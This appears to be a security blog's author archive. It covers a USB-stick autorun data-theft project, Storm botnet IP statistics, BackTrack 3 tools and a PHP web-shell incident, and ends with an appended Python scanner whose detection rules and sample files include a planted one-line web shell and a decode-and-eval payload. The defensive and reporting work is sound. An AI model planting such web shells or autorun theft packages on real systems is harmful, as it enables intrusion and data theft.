In a recent (experimental only) project, I followed one of the multiple guides such as this one on how to make a Lego case for a USB stick. To top it off, I loaded the Hak5 Switchblade packages on the sticks. When used with U3 USB autorun technology, these packages allow automatic theft of various personal data upon insertion of the stick into a Windows computer. Now, doesn’t this just crush the competition (a regular USB stick lost in the parking lot)?
Author Archive for aleksey
Due to a recent need to create a fresh blacklist, we collected and analyzed 16,000+ unique Storm bot IPs over 2 days. Our results confirm some of the findings of this recent paper regarding the size of the Storm botnet. It estimates the Storm botnet’s size at 5,000 - 6,000 unique IPs (lower bound) and 45,000 - 80,000 (upper bound).
The majority of infected machines are located in the USA, Russia, Mexico, India, Turkey, Brazil and Poland (in that order). The complete list is here. A partial list of the top results (country, unique IPs) is below.
United States 1716
Russian Federation 1177
Mexico 869
India 699
Turkey 609
Continue reading ‘Storm Worm IP List and Country Distribution Statistics’
BackTrack 3 (2007-12-14) is a penetration testing live Linux distribution. It is packed with a plethora of tools organized by category.
With this large amount of utilities, it is sometimes hard to pick the correct one for the job. At Shmoocon 2008, a BackTrack representative gave a talk which was good, but focused on exploiting a Windows binary using Olly, not on showing off the features of the distribution. So I took it upon myself to click on every single link and find the awesome and the less awesome tools among the bunch. Note that the work that I did was for a presentation. There are videos which are self-explanatory but at times need commentary. I will provide some explanation in writing.
In a recent incident, a school server (not an ISIS server) was compromised. PHP code was injected that listened for and executed commands passed through a POST request with ‘www’ user privileges. Some of the commands that were run include id, pwd, as well as directory searches and wgets of various files. The compromised machine also served as a hop in a pharmacy ad delivery scheme. It redirected HTTP requests for medications to a possible ‘mothership’ server. There is evidence that links to our server were posted as ads on websites like MySpace.
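As an added example (not code from the original post), a small Python scanner for the kind of injected PHP described above: it flags lines where request data, or a decoded blob, flows straight into a command or eval sink. The file paths and file contents are constructed for illustration.

```python
import re
from typing import Dict, List, Tuple

# PHP functions that hand a string to a shell or to the PHP interpreter.
EXEC_FUNCS = r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
# Request superglobals a remote client controls directly.
REQUEST_VARS = r"\$_(?:POST|GET|REQUEST|COOKIE)\b"

RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    # Request data passed into a command/eval sink on the same line,
    # i.e. the "execute whatever arrives in the POST body" pattern.
    ("request-to-exec",
     re.compile(EXEC_FUNCS + r"\s*\(\s*[^;]*" + REQUEST_VARS, re.I)),
    # Decode-then-execute, a common way to hide injected code in a file.
    ("decode-to-exec",
     re.compile(EXEC_FUNCS + r"\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I)),
]

def scan_php_source(src: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, rule_name, stripped_line) for every line that matches a rule."""
    hits = []
    for no, line in enumerate(src.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((no, name, line.strip()))
                break  # one finding per line is enough for triage
    return hits

def scan_tree(files: Dict[str, str]) -> Dict[str, List[Tuple[int, str, str]]]:
    """Map path -> findings for every file with at least one hit (paths with no hits are omitted)."""
    return {path: h for path, src in files.items() if (h := scan_php_source(src))}

# Constructed sample web root: one legitimate file, two planted ones.
SAMPLE_FILES = {
    "var/www/html/index.php":
        "<?php\n$name = htmlspecialchars($_GET['name']);\necho \"Hello $name\";\n",
    "var/www/html/img/.cache.php":
        "<?php\nif (isset($_POST['c'])) { echo system($_POST['c']); }\n",
    "var/www/html/lib/x.php":
        "<?php\neval(gzinflate(base64_decode('<placeholder blob>')));\n",
}

if __name__ == "__main__":
    for path, findings in scan_tree(SAMPLE_FILES).items():
        for no, rule, line in findings:
            print(f"{path}:{no}: [{rule}] {line}")
```

In practice the same scan runs over the real document root and is paired with a file-integrity baseline, since a dropped file in an image or cache directory with a recent mtime is itself a strong signal.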